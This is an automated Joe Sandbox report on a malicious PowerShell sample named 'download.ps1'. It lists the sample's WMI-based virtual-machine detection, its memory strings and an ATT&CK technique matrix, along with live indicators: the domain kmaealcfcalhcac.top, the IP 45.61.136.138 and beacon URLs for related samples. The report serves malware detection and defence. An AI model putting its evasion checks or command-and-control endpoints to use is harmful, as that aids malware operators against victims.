Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9954Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.1655676223.0000019EEE33E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90250000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.1652565637.0000019EEDFF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80BD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine G+4
Source: powershell.exe, 00000000.00000002.1652565637.0000019EEDFF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80BD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware G+4
Source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIOTAy
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80BD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic
download.ps111%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://kmaealcfcalhcac.top0%Avira URL Cloudsafe
https://0.google.com/0%Avira URL Cloudsafe
https://0.google0%Avira URL Cloudsafe
http://0.google.0%Avira URL Cloudsafe
https://apis.google.comh0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXz#n0%Avira URL Cloudsafe
http://0.google.com/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kmaealcfcalhcac.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.190.132
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80CF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E8187F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E8189B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E8188D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81892000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81A87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E818A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81884000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E818A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81889000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlXz#npowershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://0.google.com/powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://kmaealcfcalhcac.toppowershell.exe, 00000000.00000002.1625609417.0000019E80BD3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://apis.google.comhpowershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/PesterXz#npowershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.google.compowershell.exe, 00000000.00000002.1625609417.0000019E80CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://apis.google.compowershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.1652565637.0000019EEDFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.micrpowershell.exe, 00000000.00000002.1653873389.0000019EEE0F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1625609417.0000019E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://0.googlepowershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://0.google.powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://0.google.com/powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://pesterbdd.com/images/Pester.pngXz#npowershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.quovadis.bm0powershell.exe, 00000000.00000002.1652565637.0000019EEDFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1625609417.0000019E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                142.250.190.132
                                                                                                		www.google.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                45.61.136.138
                                                                                                		kmaealcfcalhcac.topUnited States
                                                                                                		40676AS40676UStrue

                                                                                                General Information

                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                Analysis ID:1589105
                                                                                                Start date and time:2025-01-11 09:59:41 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 5m 53s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                Run name:Suspected VM Detection
                                                                                                Number of analysed new started processes analysed:7
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:download.ps1
                                                                                                Detection:MAL
                                                                                                Classification:mal72.evad.winPS1@2/7@2/2
                                                                                                EGA Information:Failed
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 15
                                                                                                • Number of non-executed functions: 17
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .ps1

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8416 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                04:01:49API Interceptor28x Sleep call for process: powershell.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kmaealcfcalhcac.top/36aol1ybpfhtr.php?id=computer&key=67225157272&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kmaealcfcalhcac.top/92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527
                                                                                                http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                • diebinjmajbkhhg.top/1.php?s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • jejmbadfmeenlnk.top/exikvouhlzhtr.php?id=computer&key=73195386263&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • jejmbadfmeenlnk.top/7zp8hc951fhtr.php?id=user-PC&key=47155048466&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • jejmbadfmeenlnk.top/jkhy8nim3ohtr.php?id=computer&key=23808639779&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                kmaealcfcalhcac.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
